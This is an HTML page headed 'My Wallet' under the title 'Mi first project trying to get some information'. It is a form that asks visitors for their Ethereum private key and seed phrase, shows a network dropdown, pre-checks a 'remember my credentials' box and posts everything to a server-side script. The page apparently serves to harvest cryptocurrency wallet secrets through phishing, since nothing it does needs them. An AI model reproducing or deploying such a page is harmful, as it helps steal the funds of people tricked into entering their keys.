<!DOCTYPE html>
<html>

<head>
  <meta name="" content="width=device-width, initial-scale=1">
  <title>Mi first project trying to get some information</title>
  <link rel="stylesheet" href="index.css">

</head>

<body>

  <h2>My Wallet</h2>

  <form action="/action_page.php" method="post">
    <div class="imgcontainer">
      <img src="img_avatar2.jpg" alt="Avatar" class="avatar">
    </div>

    <div class="container">


      <label for="psw"><b>Private key</b></label>
      <input type="password" placeholder="Enter your private key - it will not be visible" name="psw" required>

      <label for="uname"><b>Seed phase</b></label>
      <input type="text" placeholder="Enter your seed phase" name="uname" required>

      <div class="dropdown">
        <button onclick="myFunction()" class="dropbtn">Network</button>
        <div id="myDropdown" class="dropdown-content">
          <input type="text" placeholder="Select the network" id="myInput" onkeyup="filterFunction()">
          <a>Homestead</a>
          <a>rinkeby</a>
          <a>ropsten</a>
          <a>kovan</a>
          <a>goerli</a>

        </div>
      </div>

      <button type="submit">Access</button>
      <label>
        <input type="checkbox" checked="checked" name="remember"> Remember my credentials
      </label>
    </div>

    <script>

      function myFunction() {
        document.getElementById("myDropdown").classList.toggle("show");
      }

      function filterFunction() {
        var input, filter, ul, li, a, i;
        input = document.getElementById("myInput");
        filter = input.value.toUpperCase();
        div = document.getElementById("myDropdown");
        a = div.getElementsByTagName("a");
        for (i = 0; i < a.length; i++) {
          txtValue = a[i].textContent || a[i].innerText;
          if (txtValue.toUpperCase().indexOf(filter) > -1) {
            a[i].style.display = "";
          } else {
            a[i].style.display = "none";
          }
        }
      }
    </script>


    <div class="container" style="background-color:#f1f1f1">
      <button type="button" class="cancelbtn">Cancel</button>
      <span class="psw">Dont have a private key? <a href="#">Create a private key</a></span>
    </div>


</body>

</html>